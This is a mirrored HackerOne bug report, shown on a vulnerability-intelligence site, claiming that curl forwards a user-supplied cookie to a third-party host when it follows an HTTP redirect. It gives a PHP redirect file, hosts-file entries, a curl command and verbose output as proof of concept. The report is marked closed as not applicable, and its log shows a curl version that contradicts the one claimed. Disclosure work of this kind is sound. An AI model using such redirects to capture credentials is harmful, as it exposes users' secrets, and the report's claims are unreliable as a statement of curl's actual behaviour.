Loading HuntDB...
Hunt
Vulnerability Intelligence by wss.sh
Home Daily Briefings High Impact CVEs Recent Exploits KEV Catalog GitHub Advisories Latest Updates Security News
Sign In Sign Up

cookie is sent on redirect

Medium
C
curl
Submitted None
Actions:
View on HackerOne
Reported by iylz

Vulnerability Details

Technical details and impact analysis

Insufficiently Protected Credentials
## Summary: [add summary of the vulnerability] Curl can be coaxed to leak user credentials to third-party host by issuing HTTP redirect. ## Steps To Reproduce: [add details for how we can reproduce the issue] 1.Create a 302.php file, such as: ``` <?php header("Location: http://a.com:8000"); ?> ``` Add the 2 record in the /etc/hosts file: ``` 127.0.0.1 a.com 127.0.0.1 b.com ``` 2. curl -vv --cookie 'aaa=2222' http://b.com/302a.php -L The redirect will be followed, and the confidential headers cookie will be sent to a.com: ``` # ./curl -V curl 8.6.0 (x86_64-pc-linux-gnu) libcurl/8.6.0 OpenSSL/1.0.2k-fips zlib/1.2.7 Release-Date: 2024-01-31 Protocols: dict file ftp ftps gopher gophers http https imap imaps ipfs ipns mqtt pop3 pop3s rtsp smb smbs smtp smtps telnet tftp Features: alt-svc AsynchDNS HSTS HTTPS-proxy IPv6 Largefile libz NTLM SSL threadsafe UnixSockets # curl -vv --cookie 'aaa=2222' http://b.com/302a.php -L * About to connect() to b.com port 80 (#0) * Trying 127.0.0.1... * Connected to b.com (127.0.0.1) port 80 (#0) > GET /302a.php HTTP/1.1 > User-Agent: curl/7.29.0 > Host: b.com > Accept: */* > Cookie: aaa=2222 > < HTTP/1.1 302 Found < Date: Fri, 02 Feb 2024 08:49:12 GMT < Server: Apache/2.4.6 (CentOS) PHP/5.4.16 < X-Powered-By: PHP/5.4.16 < Location: http://a.com:8000 < Content-Length: 0 < Content-Type: text/html; charset=UTF-8 < * Connection #0 to host b.com left intact * Issue another request to this URL: 'http://a.com:8000' * About to connect() to a.com port 8000 (#1) * Trying 127.0.0.1... * Connected to a.com (127.0.0.1) port 8000 (#1) > GET / HTTP/1.1 > User-Agent: curl/7.29.0 > Host: a.com:8000 > Accept: */* > Cookie: aaa=2222 ``` This does not comply with RFC regulations and is inconsistent with browser behavior, and RFC also states that redirection requires deleting cookies. https://www.ietf.org/rfc/rfc9110.txt ``` 3. Consider removing header fields that were not automatically generated by the implementation (i.e., those present in the request because they were added by the calling context) where there are security implications; this includes but is not limited to Authorization and Cookie. ``` ## Supporting Material/References: [list any additional material (e.g. screenshots, logs, etc.)] * [attachment / reference] https://www.ietf.org/rfc/rfc9110.txt ## Impact Leak of confidential information (user credentials).

Report Details

Additional information and metadata

State

Closed

Substate

Not-Applicable

Submitted

Weakness

Insufficiently Protected Credentials